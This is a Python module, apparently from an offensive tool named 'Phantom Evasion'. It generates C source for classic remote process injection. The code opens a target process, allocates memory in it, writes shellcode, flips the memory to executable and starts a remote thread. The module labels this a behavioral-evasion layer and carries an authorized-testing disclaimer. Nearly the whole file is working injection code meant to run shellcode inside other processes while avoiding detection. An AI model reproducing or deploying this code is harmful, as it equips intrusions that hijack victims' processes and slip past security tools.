"""
Phantom Evasion - Classic Process Injection

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


def generate_classic_injection() -> Dict[str, Any]:
    """Generate C code for classic remote process injection.

    Steps:
        1. ``OpenProcess`` – obtain a handle to the target process.
        2. ``VirtualAllocEx`` – allocate RWX memory in the remote process.
        3. ``WriteProcessMemory`` – copy shellcode into the allocation.
        4. ``VirtualProtectEx`` – change protection to RX (W^X).
        5. ``CreateRemoteThread`` – start a thread at the shellcode address.
        6. ``WaitForSingleObject`` / ``CloseHandle`` – clean up.

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    code = r"""\
// Classic Remote Process Injection – generated by Phantom Evasion
// Layer 4 – Behavioral Evasion
// VirtualAllocEx + WriteProcessMemory + CreateRemoteThread injection.

#include <windows.h>
#include <stdio.h>

#ifndef __PHANTOM_CLASSIC_INJ_DEFINED__
#define __PHANTOM_CLASSIC_INJ_DEFINED__

static BOOL classic_inject(DWORD pid,
                            unsigned char *shellcode,
                            size_t shellcode_len) {
    HANDLE hProcess = NULL;
    if (pid == GetCurrentProcessId()) {
        hProcess = GetCurrentProcess();
    } else {
        hProcess = OpenProcess(
            PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD,
            FALSE, pid);
    }
    if (!hProcess) return FALSE;

    // Allocate RW memory in the target process
    LPVOID pRemoteBuf = VirtualAllocEx(hProcess, NULL, shellcode_len,
                                        MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!pRemoteBuf) {
        MessageBoxA(NULL, "VirtualAllocEx Failed", "ERROR", MB_OK | MB_ICONERROR);
        CloseHandle(hProcess);
        return FALSE;
    }

    // Write the shellcode to the allocated memory
    if (!WriteProcessMemory(hProcess, pRemoteBuf, shellcode, shellcode_len, NULL)) {
        MessageBoxA(NULL, "WriteProcessMemory Failed", "ERROR", MB_OK | MB_ICONERROR);
        VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return FALSE;
    }

    // Change protection to RX
    DWORD old_protect = 0;
    if (!VirtualProtectEx(hProcess, pRemoteBuf, shellcode_len,
                        PAGE_EXECUTE_READ, &old_protect)) {
        MessageBoxA(NULL, "VirtualProtectEx Failed", "ERROR", MB_OK | MB_ICONERROR);
        VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return FALSE;
    }

    // Create a remote thread to execute the shellcode
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0,
                                        (LPTHREAD_START_ROUTINE)pRemoteBuf,
                                        NULL, 0, NULL);
    if (!hThread) {
        MessageBoxA(NULL, "CreateRemoteThread Failed", "ERROR", MB_OK | MB_ICONERROR);
        VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return FALSE;
    }

    MessageBoxA(NULL, "Thread Created Successfully!", "DEBUG", MB_OK);
    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
    if (pid != GetCurrentProcessId()) CloseHandle(hProcess); // Only close if not current process
    return TRUE;
}

#endif /* __PHANTOM_CLASSIC_INJ_DEFINED__ */
"""

    return {
        "code": code,
        "description": "Classic injection: VirtualAllocEx + WriteProcessMemory + CreateRemoteThread",
        "layer": "Layer 4 - Behavioral Evasion",
        "name": "classic_injection",
    }
